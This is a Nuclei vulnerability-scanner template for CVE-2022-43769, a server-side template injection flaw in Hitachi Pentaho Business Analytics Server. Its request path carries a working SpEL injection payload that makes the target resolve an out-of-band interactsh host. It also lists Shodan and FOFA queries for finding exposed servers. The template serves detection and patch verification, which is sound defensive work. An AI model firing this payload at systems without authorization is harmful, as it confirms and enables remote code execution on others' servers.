nuclei-templates/http/cves/2022/CVE-2022-43769.yaml

54 lines
2.5 KiB
YAML
Raw Normal View History

2023-04-04 23:02:10 +00:00
id: CVE-2022-43769
info:
name: Hitachi Pentaho Business Analytics Server - Remote Code Execution
2023-04-04 23:02:10 +00:00
author: dwbzn
severity: high
2023-04-06 05:31:25 +00:00
description: |
Hitachi Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x, is susceptible to remote code execution via server-side template injection. Certain web services can set property values which contain Spring templates that are interpreted downstream, thereby potentially enabling an attacker to execute malware, obtain sensitive information, modify data, and/or perform unauthorized operations without entering necessary credentials.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected server.
2023-09-06 11:59:08 +00:00
remediation: Upgrade to 9.4 with Service Pack 9.4.0.1. For version 9.3, recommend updating to Service Pack 9.3.0.2.
2023-04-04 23:02:10 +00:00
reference:
2023-04-06 05:31:25 +00:00
- https://support.pentaho.com/hc/en-us/articles/14455561548301--Resolved-Pentaho-BA-Server-Failure-to-Sanitize-Special-Elements-into-a-Different-Plane-Special-Element-Injection-Versions-before-9-4-0-1-and-9-3-0-2-including-8-3-x-Impacted-CVE-2022-43769-
- https://nvd.nist.gov/vuln/detail/CVE-2022-43769
2023-07-11 19:49:27 +00:00
- http://packetstormsecurity.com/files/172296/Pentaho-Business-Server-Authentication-Bypass-SSTI-Code-Execution.html
2023-04-06 05:31:25 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
2023-04-17 13:24:35 +00:00
cve-id: CVE-2022-43769
2023-07-11 19:49:27 +00:00
cwe-id: CWE-94,CWE-74
epss-score: 0.68571
epss-percentile: 0.97978
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:a:hitachi:vantara_pentaho_business_analytics_server:*:*:*:*:*:*:*:*
2023-04-04 23:02:10 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 11:59:08 +00:00
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: hitachi
product: vantara_pentaho_business_analytics_server
2023-09-06 11:59:08 +00:00
shodan-query: http.favicon.hash:1749354953
2024-05-31 19:23:20 +00:00
fofa-query: icon_hash=1749354953
2024-05-03 02:29:56 +00:00
tags: cve,cve2022,packetstorm,rce,ssti,pentaho,hitachi
2023-04-04 23:02:10 +00:00
http:
2023-04-06 05:31:25 +00:00
- method: GET
path:
- "{{BaseURL}}/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{T(java.net.InetAddress).getByName('{{interactsh-url}}')}&mgrDn=a&pwd=a"
matchers-condition: and
2023-04-04 23:02:10 +00:00
matchers:
- type: word
2023-07-11 19:49:27 +00:00
part: interactsh_protocol # Confirms the DNS Interaction
2023-04-04 23:02:10 +00:00
words:
- "dns"
2023-04-06 05:31:25 +00:00
- type: word
part: body
words:
- "false"
- type: word
part: header
words:
- "application/json"
# digest: 4b0a00483046022100b6fe5cb4fe0961d377873ec798ae30e388a187213c0b8346113ef78710c260b7022100e9b8d091872aa733437d61c7871e8a27d049d6008c3c6e7222fbbc60c446f68d:922c64590222798bb761d5b6d8e72950